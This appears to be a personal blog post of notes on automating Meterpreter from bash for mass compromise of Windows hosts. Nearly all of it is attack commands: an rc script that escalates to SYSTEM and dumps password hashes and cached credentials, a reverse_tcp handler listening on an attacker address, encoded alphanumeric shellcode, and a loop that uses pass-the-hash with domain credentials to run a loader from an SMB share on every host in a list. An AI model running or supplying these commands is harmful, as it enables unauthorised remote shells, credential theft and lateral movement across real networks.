Automating Meterpreter from bash

This is pretty disgusting and a stupidly unstable hackjob, but it worked and this blog is more for notes for myself anyway...


Generate the post-exploitation comand rc file:

cat > /root/automsf.rc

getsystem

run post/windows/gather/smart_hashdump

run post/windows/gather/cachedump

exit

Then run msfconsole to listen for the callback:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 10.10.10.10

set AutoRunScript multi_console_command -rc /root/automsf.rc

expoit -j -z

 Then generate the payload to use with sce:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.1.1.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

 Then run the forloop while serving sce from a share

for i in `cat file-of-smb-hosts`; do 

echo grabbing $i; 

winexe-PTH -U 'DOM\user%password' --uninstall //$i 'cmd.exe /c \\10.10.10.10\smb_share\sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI9lzHOys0uP30aplIKUfQn2QtNkf2vPNk0RdLlK0RftLK42Q86oMg1ZFFVQKOUayPLlElQqqlgrFL5piQXOdMGqzgxbHpaBCgLKV26pnkqR7LVaHPNk1PT8NeYP440J31zpbplKsx6xnkCha0uQiC8cGLBink4tNk7qIFp1io5aiPLlYQjodMwqO7GH9El45S1mIhEkQmtd1eZB3hnkchGTVaiC0fnkTL0KLKpXgluQkcnkwtlKC1xPLIRd14ddQKaKU1Ci1JCa9o9paHSopZNk7bXkmV3mE8FSTrWps0RH3Gt3p2copTBHPL47gVVgYoyEoHj0eQc0ePwYzdRtpPPhWYm; 

done

Now it should iterate through all of the IPs in the text file, executing sce from a share (no hard drive footprint) and executing the callback to your msfconsole listener. It then auto loads the rest of the payload, executes the .rc file, and exists. Rinse and repeat with the next IP